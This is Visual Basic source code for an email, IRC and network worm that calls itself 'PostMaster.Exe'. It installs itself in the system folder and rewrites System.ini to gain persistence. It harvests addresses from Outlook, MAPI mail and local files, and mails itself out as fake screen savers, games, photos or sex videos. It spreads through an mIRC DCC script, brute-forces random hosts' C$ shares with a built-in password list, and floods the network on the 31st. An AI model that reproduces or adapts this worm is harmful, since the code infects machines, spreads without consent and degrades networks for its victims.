Dim Fso, Wnt, Wol, Wom, Wos, Windir, Winsys, Wincmd, Wintmp, NewFile, OldFile, OutLook, TextBody, Program, EUser, HUser, EPassword, EmailAddress, EmailSubject, EmailBody, EmailPrg Sub Main() On Error Resume Next Dim Server, TmpAddress As String, Start, Last, Start1, Last1 Call Init Call Copy_To Call Auto_Run Call Mail_Worm For Each Drive In Fso.Drives Call Sub_Folder(Fso.GetFolder(Drive & "\")) Next Drive Let Start = 0 Let Last = 0 Do Until (Last >= Len(EmailAddress)) Let Start = Last + 1 Let Last = InStr(Start, EmailAddress, "*") If Send_Ok(Mid(EmailAddress, Start, Last - Start)) = True Then Send_Mail (Mid(EmailAddress, Start, Last - Start)) End If Loop Wos.SignOff Set Wos = Nothing Set Wom = Nothing Set Wol = Nothing Call Net_Work End Sub Sub Init() On Error Resume Next Dim Tmp Randomize Minute(Time) + Hour(Time) + Second(Time) + Day(Date) Set Fso = CreateObject("scripting.filesystemobject") Set Wnt = CreateObject("wscript.network") Set Wol = CreateObject("outlook.application") Let OutLook = True If Err.Number = 429 Then OutLook = False Let Windir = Fso.GetSpecialFolder(WindowsFolder) Let Winsys = Fso.GetSpecialFolder(SystemFolder) Let Wintmp = Fso.GetSpecialFolder(TemporaryFolder) Let Wincmd = Windir & "\Command\Ebd" Let Program = GetExeName Let EUser = "administrator*admin*master*webmaster*webroot*root*system*" Let EPassword = "internet*administrator*admin*master*network*webserver*server*root*webmaster*webroot*system*windows*computer*passwd*password*webroot*shell*login*webpage*nopasswd*nopassword*1234*4321*" End Sub Function Send_Ok(Address) On Error Resume Next Send_Ok = True If Not Fso.FileExists(Winsys & "\Erifeci.Vxd") Then Set NewFile = Fso.CreateTextFile(Winsys & "\Erifeci.Vxd") NewFile.WriteLine "[PostMaster.Exe V1.0 MadeIn:CHINA]" NewFile.WriteLine Address NewFile.Close Fso.GetFile(Winsys & "\Erifeci.Vxd").Attributes = 7 Else: Let TextBody = "" Set OldFile = Fso.OpenTextFile(Winsys & "\Erifeci.Vxd") Do Until (OldFile.AtEndOfStream) Let TextBody = TextBody & OldFile.ReadLine & vbCrLf Loop OldFile.Close If InStr(TextBody, Address) Then Let Send_Ok = False Else: Fso.GetFile(Winsys & "\Erifeci.Vxd").Attributes = 0 Set OldFile = Fso.OpenTextFile(Winsys & "\Erifeci.Vxd", 2) OldFile.Write TextBody OldFile.WriteLine Address OldFile.Close Fso.GetFile(Winsys & "\Erifeci.Vxd").Attributes = 7 End If End If End Function Sub Send_Mail(Address) On Error Resume Next Dim Mail, Tmp, User, Server, Start, Last Let Start = 1 Let Last = InStr(Address, "@") Let User = Mid(Address, 1, Last - Start) Let Server = Right(Address, Len(Address) - (Len(User) + 1)) Let Tmp = Int((Rnd * 4) + 1) Select Case Tmp Case 1: Let EmailSubject = User & ",How Are You?" Let EmailBody = EmailSubject & vbCrLf & Space(2) & "If You Like Cool Screen Save,Please Check This Attachment File." & vbCrLf & _ "If You Have Other Cool Screen Save,Please Send To Me!My New E-Mail Address Is:" & "New" & User & "@" & Server & ".Thanks!" Let EmailPrg = Wintmp & "\My-Cool-Screen-Save.Scr" Case 2: Let EmailSubject = "This Mail For My " & User & "!" Let EmailBody = " I Very Like Play Computer Game,Attachment Is Very Well Computer Game.If You Like Play Too Me,Please Check This Attachment File." & vbCrLf & _ "If You Have Other Game,Please Send To Me!My New E-Mail Address Is:" & "New" & User & "@" & Server & ".Thanks!" Let EmailPrg = Wintmp & "\Well-Computer-Game.Exe" Case 3: Let EmailSubject = User & ",Help Me!" Let EmailBody = " Please Open Attachment File,You Can See A Photo,But I Dont Know Is Who?Please Help Me!" & vbCrLf & _ "Please Send Your Reply To Me! My New E-Mail Address Is:New" & User & "@" & Server & ".Thanks!" Let EmailPrg = Wintmp & "\Photo.Jpg.Scr" Case 4: Let EmailSubject = "Sex Movie For My " & User & "!" Let EmailBody = " Attachment Is Sex Movie.If You Like,Please Check Attachment File.If You Have Other Sex Movie,Please " & vbCrLf & _ "Dont Forget Me,I Need!Please Send Your Movie To My New E-Mail Address:" & "New" & User & "@" & Server & ".Thanks!" Let EmailPrg = Wintmp & "\Sex-Movie.Exe" End Select Fso.CopyFile Winsys & "\Himem.Exe", EmailPrg If OutLook = True Then Set Mail = Wol.CreateItem(0) Mail.Recipients.Add (Address) Mail.Subject = EmailSubject Mail.Body = EmailBody Mail.Attachments.Add (EmailPrg) Mail.Send Else: Wom.Compose Wom.MsgIndex = -1 Wom.RecipAddress = Address Wom.MsgSubject = EmailSubject Wom.MsgNoteText = EmailBody Wom.AttachmentPathName = EmailPrg Wom.Send End If Set Mail = Nothing Fso.GetFile(EmailPrg).Attributes = 0 Fso.DeleteFile EmailPrg End Sub Sub Mail_Worm() On Error Resume Next Dim Times, Mapi, A, Ctrentries If OutLook = False Then Set Wom = CreateObject("MSMAPI.MapiMessages") Set Wos = CreateObject("MSMAPI.MapiSession") Wos.DownLoadMail = False Wos.NewSession = False Wos.LogonUI = True Wos.SignOn Wom.SessionID = Wos.SessionID Wom.FetchSorted = True Wom.Fetch For Times = 0 To Wom.MsgCount - 1 Wom.MsgIndex = Times If Send_Ok(Wom.MsgOrigAddress) = True Then Send_Mail (Wom.MsgOrigAddress) Next Else: Set Mapi = Wol.GetNameSpace("MAPI") For ctrlists = 1 To Mapi.AddressLists.Count Set A = Mapi.AddressLists(ctrlists) For Ctrentries = 1 To A.AddressEntries.Count If Send_Ok(A.AddressEntries(Ctrentries)) = True Then Send_Mail (A.AddressEntries(Ctrentries)) Next Next Set Mapi = Nothing Set A = Nothing End If End Sub Function GetExeName() On Error Resume Next Dim GetReally As Boolean Let GetReally = False Do Until (GetReally = True) If Len(App.Path) = 3 Then Let FileName = App.Path & LCase(Dir(App.Path & App.EXEName & ".*")) Else: Let FileName = App.Path & "\" & LCase(Dir(App.Path & "\" & App.EXEName & ".*")) End If If InStr(FileName, "exe") Or InStr(FileName, "scr") Or InStr(FileName, "pif") Or InStr(FileName, "com") Then Let TextBody = "" Set OldFile = Fso.OpenTextFile(FileName) Do Until (OldFile.AtEndOfStream) Let TextBody = TextBody & OldFile.ReadLine Loop OldFile.Close If Fso.GetFile(FileName).Size = 18944 Then GetReally = True: GetExeName = FileName End If Loop End Function Sub Copy_To() On Error Resume Next If Not Fso.FileExists(Winsys & "\Himem.Exe") Then Shell Windir & "\Explorer.Exe", vbMaximizedFocus Fso.CopyFile Program, Winsys & "\Himem.Exe" Fso.GetFile(Winsys & "\Himem.Exe").Attributes = 7 End If For Each Drive In Fso.Drives If Not Fso.FileExists(Drive & "\Sex_Movie.Scr") Then Fso.CopyFile Program, Drive & "\Sex_Movie.Scr" Fso.GetFile(Drive & "\Sex_Movie.Scr").Attributes = 5 End If Next If Not Fso.FileExists(Wincmd & "\Sex_Movie.Scr") Then Fso.CopyFile Program, Wincmd & "\Sex_Movie.Scr" Fso.GetFile(Wincmd & "\Sex_Movie.Scr").Attributes = 5 End If End Sub Sub Auto_Run() On Error Resume Next Dim Tmp As Integer TextBody = "" Set OldFile = Fso.OpenTextFile(Windir & "\System.ini") Do Until (OldFile.AtEndOfStream) TextBody = TextBody & OldFile.ReadLine & vbCrLf Loop OldFile.Close If InStr(LCase(TextBody), "shell=explorer.exe " & LCase(Winsys) & "\himem.exe") = 0 Then Let Tmp = Fso.GetFile(Windir & "\System.ini").Attributes Fso.GetFile(Windir & "\System.ini").Attributes = 0 Set NewFile = Fso.OpenTextFile(Windir & "\System.ini", 2) NewFile.Write Replace(LCase(TextBody), "shell=explorer.exe", "shell=Explorer.exe " & Winsys & "\Himem.exe") NewFile.Close Fso.GetFile(Windir & "\System.ini").Attributes = Tmp End If End Sub Sub Sub_Folder(SubFolder) On Error Resume Next For Each File In SubFolder.Files Call Sub_File(File) Next File For Each Folder In SubFolder.SubFolders Call Sub_Folder(Folder) Next Folder End Sub Sub Sub_File(File) On Error Resume Next Dim ExtName, Mirc, Address, Start, Last, Times, NoLetter Let ExtName = LCase(Fso.GetExtensionName(File.Path)) If LCase(File.Name) = "mirc.ini" And InStr(LCase(File.Path), "\mirc") Then Let Mirc = Fso.GetParentFolderName(File.Path) Fso.GetFile(Mirc & "\Script.ini").Attributes = 0 Set NewFile = Fso.CreateTextFile(Mirc & "\Script.ini", True) NewFile.WriteLine ";PostMaster.Exe V1.0 MadeIn:CHINA" NewFile.WriteLine ";Good Wish For You!!!" NewFile.WriteLine "n0=on 1:JOIN:#:{" NewFile.WriteLine "n1= /if ( $nick == $me ) { halt }" NewFile.WriteLine "n2= /.dcc send $nick " & Wincmd & "\Sex_Movie.Scr" NewFile.WriteLine "n3=}" NewFile.Close Fso.GetFile(Mirc & "\Script.ini").Attributes = 7 ElseIf ExtName = "htm" Or ExtName = "html" Or ExtName = "hta" Or _ ExtName = "shtml" Or ExtName = "shtm" Then TextBody = "" Set OldFile = Fso.OpenTextFile(File.Path) Do Until (OldFile.AtEndOfStream) Let TextBody = TextBody & OldFile.ReadLine & vbCrLf Loop OldFile.Close Let Start = 1 Do Until (Start = 0) Let NoLetter = True Let Start = InStr(Start, LCase(TextBody), "mailto:") If Start <> 0 Then Start = Start + 7: NoLetter = False Let Times = Start Do Until (NoLetter = True) If InStr("abcdefghijklmnopqrstuvwxyz0123456789@._", Mid(TextBody, Times, 1)) = 0 And Times >= Start + 8 Then Let NoLetter = True Else: Let Times = Times + 1 End If Loop Let Last = Times If Start <> 0 Then Let Address = LCase(Mid(TextBody, Start, Last - Start)) If InStr(Address, ".com") Or InStr(Address, ".net") Or InStr(Address, ".edu") Or InStr(Address, ".org") Or InStr(Address, ".mil") Or InStr(Address, ".gov") Then If Right(Address, 1) <> "." Then Let EmailAddress = EmailAddress & LTrim(Mid(TextBody, Start, Last - Start)) & "*" Else: Let EmailAddress = EmailAddress & LTrim(Mid(TextBody, Start, Last - Start - 1)) & "*" End If End If Let Start = Start + 1 End If Loop ElseIf InStr("docwpscomexelnkpifbmpswfscrwavmpgmp3mp4", EXEName) = 0 Then Let TextBody = "" Set OldFile = Fso.OpenTextFile(File.Path) Do Until (OldFile.AtEndOfStream) Let TextBody = TextBody & OldFile.ReadLine & vbCrLf Loop OldFile.Close Let Start = 1 Do Until (Start = 0) Let NoLetter = True Let Start = InStr(Start, LCase(TextBody), "mail:") If Start <> 0 Then Let NoLetter = False: Let Start = Start + 5 Let Times = Start Do Until (NoLetter = True) If InStr("abcdefghijklmnopqrstuvwxyz0123456789@._", Mid(TextBody, Times, 1)) = 0 And Times >= Start + 8 Then Let NoLetter = True Else: Let Times = Times + 1 End If Loop Let Last = Times If Start <> 0 Then Let Address = LCase(Mid(TextBody, Start, Last - Start)) If InStr(Address, ".com") Or InStr(Address, ".net") Or InStr(Address, ".edu") Or InStr(Address, ".org") Or InStr(Address, ".mil") Or InStr(Address, ".gov") Then If Right(Address, 1) <> "." Then Let EmailAddress = EmailAddress & LTrim(Mid(TextBody, Start, Last - Start)) & "*" Else: Let EmailAddress = EmailAddress & LTrim(Mid(TextBody, Start, Last - Start - 1)) & "*" End If End If Let Start = Start + 1 End If Loop End If End Sub Sub Net_Work() On Error Resume Next Dim IP1, IP2, IP3, IP4, ShareName If Day(Date) = 31 Then Do DoEvents Form1.Winsock1.SendData "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" & _ "911911911911911911911911911911911911911911911911" Loop Else: Do Start: DoEvents Let IP1 = LTrim(Str(Int((Rnd * 254) + 1))) Let IP2 = LTrim(Str(Int((Rnd * 254) + 1))) Let IP3 = LTrim(Str(Int((Rnd * 254) + 1))) Let IP4 = LTrim(Str(Int((Rnd * 254) + 1))) ShareName = "\\" & IP1 & "." & IP2 & "." & IP3 & "." & IP4 & "\C" Wnt.MapNetworkDrive "o:", ShareName If Not Fso.FolderExists("o:\") Then Call Open_Pass(ShareName) End If If Not Fso.FolderExists("o:\") Then GoTo Start Fso.CopyFile Winsys & "\Himem.Exe", "o:\windows\startm~1\programs\startup\ScanReg.Pif", True Fso.CopyFile Winsys & "\Himem.Exe", "o:\Sex_Movie.Scr", True Fso.CopyFile Winsys & "\Himem.Exe", "o:\winnt\startm~1\programs\startup\ScanReg.Pif", True Fso.CopyFile Winsys & "\Himem.Exe", "o:\" & Right(Windir, Len(Windir) - 3) & "\startm~1\programs\startup\ScanReg.Pif", True Wnt.RemoveNetworkDrive "o:" Loop End If End Sub Sub Open_Pass(ShareName) Dim Start, Last, Tmp, Tmp1, Start1, Last1 Let Start = 0 Let Last = 0 Do Until (Last = Len(EUser)) Let Start = Last + 1 Let Last = InStr(Start, EUser, "*") Let Tmp = Mid(EUser, Start, Last - Start) Let Start1 = 0 Let Last1 = 0 Do Until (Last1 = Len(EPassword)) Let Start1 = Last1 + 1 Let Last1 = InStr(Start1, EPassword, "*") Let Tmp1 = Mid(EPassword, Start1, Last1 - Start1) Wnt.MapNetworkDrive "o:", ShareName, Tmp, Tmp1 If Fso.FolderExists("o:\") Then Exit Sub Loop Loop End Sub ËæʱÓëÎÒÁªÏµ:zhenghao@vip.sina.com |